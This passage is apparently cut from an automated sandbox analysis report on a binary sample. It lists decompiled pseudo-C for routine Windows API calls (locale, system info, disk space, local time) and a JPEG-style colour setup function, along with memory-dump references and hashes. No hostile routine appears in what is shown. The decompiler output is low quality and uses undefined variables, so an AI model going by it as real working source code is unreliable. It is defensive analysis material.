                                                                                                                                                                                                                            0x00409f39
                                                                                                                                                                                                                            0x00409f3b
                                                                                                                                                                                                                            0x00409f44

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00409EF5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                                                                                                            • Opcode ID: 5fe8685ae6ca18acf303da7102a4e2fa751929eb57f658ac51a7ebe399a7ad83
                                                                                                                                                                                                                            • Instruction ID: 3d4088487c7580c6eb6b6515069bf83f7524b5429ff7be7e0fdab11b3544063a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fe8685ae6ca18acf303da7102a4e2fa751929eb57f658ac51a7ebe399a7ad83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C1112B5E00209AFDB00CF99C881DAFF7F9FFC8314B54C56AA404E7250E6319E018BA0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042F60C Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0042F60C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00407540();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42f646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E00403DE8(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                                                                                                                                                                                                                            0x0042f615
                                                                                                                                                                                                                            0x0042f618
                                                                                                                                                                                                                            0x0042f61a
                                                                                                                                                                                                                            0x0042f620
                                                                                                                                                                                                                            0x0042f664
                                                                                                                                                                                                                            0x0042f668
                                                                                                                                                                                                                            0x0042f669
                                                                                                                                                                                                                            0x0042f66d
                                                                                                                                                                                                                            0x0042f670
                                                                                                                                                                                                                            0x0042f671
                                                                                                                                                                                                                            0x0042f676
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042f676
                                                                                                                                                                                                                            0x0042f625
                                                                                                                                                                                                                            0x0042f62a
                                                                                                                                                                                                                            0x0042f62d
                                                                                                                                                                                                                            0x0042f637
                                                                                                                                                                                                                            0x0042f63e
                                                                                                                                                                                                                            0x0042f641
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F671
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NtdllProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4255912815-0
                                                                                                                                                                                                                            • Opcode ID: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                                                                                                                                                                                            • Instruction ID: 80422fc4f260eb885d3d5276ce9bf4904eb24ae74d3e19530ef2a12f5b611188
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa02342401d94616f2e5bd42f4260c71efb65923d14809067b41eadbea591770
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EF0F676B04214AFD700DF9AE881C96BBFCEB0D7203A140B7F908D7650D235AD009B74
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406AC6 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00406AC6(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x406b2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404C30( &_v20, 7,  &_v15);
				E004035F0(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406B35);
				return E004049C0( &_v20);
			}








                                                                                                                                                                                                                            0x00406ad1
                                                                                                                                                                                                                            0x00406ad6
                                                                                                                                                                                                                            0x00406ad7
                                                                                                                                                                                                                            0x00406adc
                                                                                                                                                                                                                            0x00406adf
                                                                                                                                                                                                                            0x00406aee
                                                                                                                                                                                                                            0x00406afe
                                                                                                                                                                                                                            0x00406b09
                                                                                                                                                                                                                            0x00406b14
                                                                                                                                                                                                                            0x00406b14
                                                                                                                                                                                                                            0x00406b1a
                                                                                                                                                                                                                            0x00406b1d
                                                                                                                                                                                                                            0x00406b20
                                                                                                                                                                                                                            0x00406b2d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                                                                                                                                                                                            • Instruction ID: 1884f1ac99702eb7bfb6ab039d2c511877b7776afc39d63850cc4166923a2af7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e46581e8cdc3331be5097877ba1128faf35b36a3c95c951874e5d987cba23955
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99F02870A04319AFE714DFA2CC42AAEB3BAF7C4310F40857AB510F31C4E7B82A10C684
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426548 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00426548(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                                                                                                                                                                                                            0x0042654e
                                                                                                                                                                                                                            0x00426551
                                                                                                                                                                                                                            0x00426554
                                                                                                                                                                                                                            0x00426558
                                                                                                                                                                                                                            0x0042655d
                                                                                                                                                                                                                            0x00426563
                                                                                                                                                                                                                            0x00426564
                                                                                                                                                                                                                            0x0042656e
                                                                                                                                                                                                                            0x00426581
                                                                                                                                                                                                                            0x0042658a
                                                                                                                                                                                                                            0x00426592
                                                                                                                                                                                                                            0x00426595
                                                                                                                                                                                                                            0x00426595
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00426570
                                                                                                                                                                                                                            0x00426570
                                                                                                                                                                                                                            0x00426573
                                                                                                                                                                                                                            0x00426575
                                                                                                                                                                                                                            0x00426578
                                                                                                                                                                                                                            0x0042657b
                                                                                                                                                                                                                            0x0042657b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00426570
                                                                                                                                                                                                                            0x0042659c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00426558
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                            • Opcode ID: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                                                                                                                                                                                            • Instruction ID: 24291676ee62f313b8705277a049495d892b78a3fb7c7c66d6bc96e5edecc5e6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b59df6a4db17697c4621f1198143272915962c4c42650c0f147f9fc6234deed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDF096B1E01119AFCB11DF98E48489DB7B4FB5A301B95429AD408DB342EB34A6D5C7C9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406AC8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E00406AC8(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x406b2e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E00404C30( &_v20, 7,  &_v15);
				E004035F0(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E00406B35);
				return E004049C0( &_v20);
			}








                                                                                                                                                                                                                            0x00406ad1
                                                                                                                                                                                                                            0x00406ad6
                                                                                                                                                                                                                            0x00406ad7
                                                                                                                                                                                                                            0x00406adc
                                                                                                                                                                                                                            0x00406adf
                                                                                                                                                                                                                            0x00406aee
                                                                                                                                                                                                                            0x00406afe
                                                                                                                                                                                                                            0x00406b09
                                                                                                                                                                                                                            0x00406b14
                                                                                                                                                                                                                            0x00406b14
                                                                                                                                                                                                                            0x00406b1a
                                                                                                                                                                                                                            0x00406b1d
                                                                                                                                                                                                                            0x00406b20
                                                                                                                                                                                                                            0x00406b2d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                                                                                                                                                                                            • Instruction ID: 8c46e58028a20f45c726cdf232f197f4d268d7d6409a4c5068237e5da40a84cb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75c1d52228b281e4a2a8cbe05b9b26f6635f1fb66f4f138c8f1ad605eb8c8863
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80F0C871A04319AFE714DFA2CC42A9EB37AF7C4714F51857AA510B71D4E7B82610C684
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040C964 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040C964(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404A14(_t10, _t18);
				}
				return E00404AB0(_t10, _t5 - 1,  &_v260);
			}






                                                                                                                                                                                                                            0x0040c96f
                                                                                                                                                                                                                            0x0040c971
                                                                                                                                                                                                                            0x0040c989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040c9a1
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                                                            • Instruction ID: c55d8128e0464d7f0ffda61b66ea8af477aea0d032980e5ba508f3227b3018b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 026571d56001ee72b0406f5d7f97dc349247158a98ed82025b723c8338f8d56e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07E092B271421457D314A6695C869EA725C9798310F00427FBA49E73C2EDB89D4446ED
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040C9B0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040C9B0(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                                                                                                                                                                                            0x0040c9b3
                                                                                                                                                                                                                            0x0040c9b4
                                                                                                                                                                                                                            0x0040c9ca
                                                                                                                                                                                                                            0x0040c9d1
                                                                                                                                                                                                                            0x0040c9cc
                                                                                                                                                                                                                            0x0040c9cc
                                                                                                                                                                                                                            0x0040c9cc
                                                                                                                                                                                                                            0x0040c9d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040E39A,00000000,0040E5B3,?,?,00000000,00000000), ref: 0040C9C3
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            • Opcode ID: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                                                            • Instruction ID: 274c397104c08bcef1503af243249226e7c8b6f68a7688c9cfeef2f5654669c9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8534821ffc97822e41bd311946462fda5bd873699444b04a03bff573cbe2e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D05EA630E2546AE214525A2D85DBB5AACCAC57B1F10423FF988E7281D2248C0693BA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040B2D4 Relevance: 1.5, APIs: 1, Instructions: 13timeCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0040B2D4(long long __fp0) {
				struct _SYSTEMTIME _v16;
				void* _t7;
				long long* _t10;
				void* _t11;
				long long _t12;

				_t12 = __fp0;
				GetLocalTime( &_v16);
				_t7 = E0040B110(_v16.wYear, _v16.wDay, _v16.wMonth, _t11, __fp0);
				 *_t10 = _t12;
				asm("wait");
				return _t7;
			}








                                                                                                                                                                                                                            0x0040b2d4
                                                                                                                                                                                                                            0x0040b2dc
                                                                                                                                                                                                                            0x0040b2f0
                                                                                                                                                                                                                            0x0040b2f5
                                                                                                                                                                                                                            0x0040b2f8
                                                                                                                                                                                                                            0x0040b2ff

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                                                                                                            • Opcode ID: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                                                                                                                                                                                            • Instruction ID: a3b185b344278dcf1c9439e42592f718bf33603f87ac91d23c0fcb87781d4dc0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d4b386aad8b6fd01d40aa064b90e864029cd9eaca585b2295d799d1887da282
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D09E28409505A1C2007B15C85549FB7A4EE84740F808D5DF4D856391EB358595C79B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0046C7CC Relevance: .2, Instructions: 238COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                                                                                            			E0046C7CC(intOrPtr* __eax, signed int __edx) {
				intOrPtr _t135;
				intOrPtr* _t138;
				signed int _t147;

				_t138 = __eax;
				_t147 = __edx;
				if( *((intOrPtr*)(__eax + 0x14)) != 0x64) {
					_t135 =  *__eax;
					 *((intOrPtr*)(_t135 + 0x14)) = 0x14;
					 *((intOrPtr*)(_t135 + 0x18)) =  *((intOrPtr*)(__eax + 0x14));
					 *((intOrPtr*)( *__eax))();
				}
				 *(_t138 + 0x3c) = _t147;
				 *(_t138 + 0xcc) = 0;
				 *((intOrPtr*)(_t138 + 0xd8)) = 0;
				if(_t147 > 5) {
					 *((intOrPtr*)( *_t138 + 0x14)) = 0xa;
					return  *((intOrPtr*)( *_t138))();
				} else {
					switch( *((intOrPtr*)(_t147 * 4 +  &M0046C810))) {
						case 0:
							__eax =  *(__ebx + 0x24);
							 *(__ebx + 0x38) =  *(__ebx + 0x24);
							__eax =  *(__ebx + 0x38);
							if(__eax < 1 || __eax > 0xa) {
								__eax =  *__ebx;
								 *(__eax + 0x14) = 0x1a;
								__edx =  *(__ebx + 0x38);
								 *(__eax + 0x18) =  *(__ebx + 0x38);
								 *((intOrPtr*)(__eax + 0x1c)) = 0xa;
								__eax = __ebx;
								__edx =  *__ebx;
								__eax =  *( *__ebx)();
							}
							__edx = 0;
							while(__edx <  *(__ebx + 0x38)) {
								__edx + __edx * 4 = __edx + (__edx + __edx * 4) * 4;
								__eax = __edx + (__edx + __edx * 4) * 4 << 2;
								__eax = (__edx + (__edx + __edx * 4) * 4 << 2) +  *(__ebx + 0x40);
								 *__eax = __edx;
								 *(__eax + 8) = 1;
								 *(__eax + 0xc) = 1;
								 *(__eax + 0x10) = 0;
								 *(__eax + 0x14) = 0;
								 *(__eax + 0x18) = 0;
								__edx = __edx + 1;
							}
							return __eax;
							goto L17;
						case 1:
							 *(_t138 + 0xcc) = 1;
							 *(_t138 + 0x38) = 1;
							_t134 =  *(_t138 + 0x40);
							 *_t134 = 1;
							_t134[2] = 1;
							_t134[3] = 1;
							_t134[4] = 0;
							_t134[5] = 0;
							_t134[6] = 0;
							return _t134;
							goto L17;
						case 2:
							 *(__ebx + 0xd8) = 1;
							 *(__ebx + 0x38) = 3;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							 *__eax = 0x52;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							__eax =  *(__ebx + 0x40) + 0x54;
							 *__eax = 0x47;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0xa8;
							__edx = 0;
							 *__eax = 0x42;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							return __eax;
							goto L17;
						case 3:
							 *(__ebx + 0xcc) = 1;
							 *(__ebx + 0x38) = 3;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							 *__eax = 1;
							 *(__eax + 8) = 2;
							 *(__eax + 0xc) = 2;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0x54;
							 *__eax = 2;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 1;
							 *(__eax + 0x14) = 1;
							 *(__eax + 0x18) = 1;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0xa8;
							 *__eax = 3;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 1;
							 *(__eax + 0x14) = 1;
							 *(__eax + 0x18) = 1;
							return __eax;
							goto L17;
						case 4:
							 *(__ebx + 0xd8) = 1;
							 *(__ebx + 0x38) = 4;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							 *__eax = 0x43;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0x54;
							__edx = 0;
							 *__eax = 0x4d;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							__eax =  *(__ebx + 0x40) + 0xa8;
							 *__eax = 0x59;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__eax =  *(__ebx + 0x40) + 0xfc;
							__edx = 0;
							 *__eax = 0x4b;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							return __eax;
							goto L17;
						case 5:
							 *(__ebx + 0xd8) = 1;
							 *(__ebx + 0x38) = 4;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							 *__eax = 1;
							 *(__eax + 8) = 2;
							 *(__eax + 0xc) = 2;
							 *(__eax + 0x10) = 0;
							__edx = 0;
							 *(__eax + 0x14) = 0;
							 *(__eax + 0x18) = 0;
							__eax =  *(__ebx + 0x40);
							__edx = 0;
							__eax =  *(__ebx + 0x40) + 0x54;
							 *__eax = 2;
							 *(__eax + 8) = 1;
							 *(__eax + 0xc) = 1;
							 *(__eax + 0x10) = 1;
